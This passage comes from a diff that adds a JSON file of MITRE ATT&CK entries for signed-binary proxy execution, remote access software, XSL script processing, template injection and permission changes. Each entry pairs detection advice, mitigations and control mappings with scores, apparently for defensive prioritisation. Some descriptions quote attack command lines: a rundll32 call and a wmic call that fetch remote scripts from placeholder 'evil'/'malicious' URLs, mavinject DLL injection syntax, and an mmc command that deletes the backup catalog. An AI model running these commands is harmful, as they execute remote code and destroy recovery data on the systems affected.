+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.010",
+        "name": "Signed Binary Proxy Execution: Regsvr32",
+        "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
+        "url": "https://attack.mitre.org/techniques/T1218/010",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            }
+        ],
+        "cumulative_score": 0.27142857142857146,
+        "adjusted_score": 0.27142857142857146,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "10.5"
+        ],
+        "nist_controls": [
+            "CA-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.011",
+        "name": "Signed Binary Proxy Execution: Rundll32",
+        "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)",
+        "url": "https://attack.mitre.org/techniques/T1218/011",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Metadata",
+            "Module: Module Load",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            }
+        ],
+        "cumulative_score": 0.3952380952380953,
+        "adjusted_score": 0.3952380952380953,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "10.5"
+        ],
+        "nist_controls": [
+            "CA-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.012",
+        "name": "Signed Binary Proxy Execution: Verclsid",
+        "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ",
+        "url": "https://attack.mitre.org/techniques/T1218/012",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.3904761904761904,
+        "adjusted_score": 0.3904761904761904,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.5",
+            "4.8",
+            "7.6",
+            "7.7",
+            "13.4",
+            "18.2",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.013",
+        "name": "Signed Binary Proxy Execution: Mavinject",
+        "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)",
+        "url": "https://attack.mitre.org/techniques/T1218/013",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\n\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.1142857142857143,
+        "adjusted_score": 0.1142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.014",
+        "name": "Signed Binary Proxy Execution: MMC",
+        "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)",
+        "url": "https://attack.mitre.org/techniques/T1218/014",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.1142857142857143,
+        "adjusted_score": 0.1142857142857143,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1219",
+        "name": "Remote Access Software",
+        "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)",
+        "url": "https://attack.mitre.org/techniques/T1219",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.935645650952381,
+        "adjusted_score": 0.935645650952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "4.2",
+            "4.4",
+            "7.6",
+            "9.3",
+            "13.3",
+            "13.4",
+            "13.8",
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.38095238095238093,
+            "mitigation_score": 0.41818181818181815,
+            "detection_score": 0.34
+        },
+        "choke_point_score": 0.55,
+        "prevalence_score": 0.00469327
+    },
+    {
+        "tid": "T1220",
+        "name": "XSL Script Processing",
+        "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”",
+        "url": "https://attack.mitre.org/techniques/T1220",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Module: Module Load",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.2357564142857143,
+        "adjusted_score": 0.2357564142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.7"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.1142857142857143,
+            "mitigation_score": 0.14545454545454545,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.0214707
+    },
+    {
+        "tid": "T1221",
+        "name": "Template Injection",
+        "description": "Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)",
+        "url": "https://attack.mitre.org/techniques/T1221",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.34285714285714286,
+        "adjusted_score": 0.34285714285714286,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.7",
+            "4.1",
+            "4.8",
+            "13.3",
+            "13.8",
+            "14.1",
+            "14.2",
+            "14.6",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SC-44",
+            "SC-7",
+            "SI-10",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.24285714285714288,
+            "mitigation_score": 0.45454545454545453,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1222",
+        "name": "File and Directory Permissions Modification",
+        "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
+        "url": "https://attack.mitre.org/techniques/T1222",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution",
+            "File: File Metadata",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1222.001",
+                "name": "File and Directory Permissions Modification: Windows File and Directory Permissions Modification",
+                "url": "https://attack.mitre.org/techniques/T1222/001",
+                "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
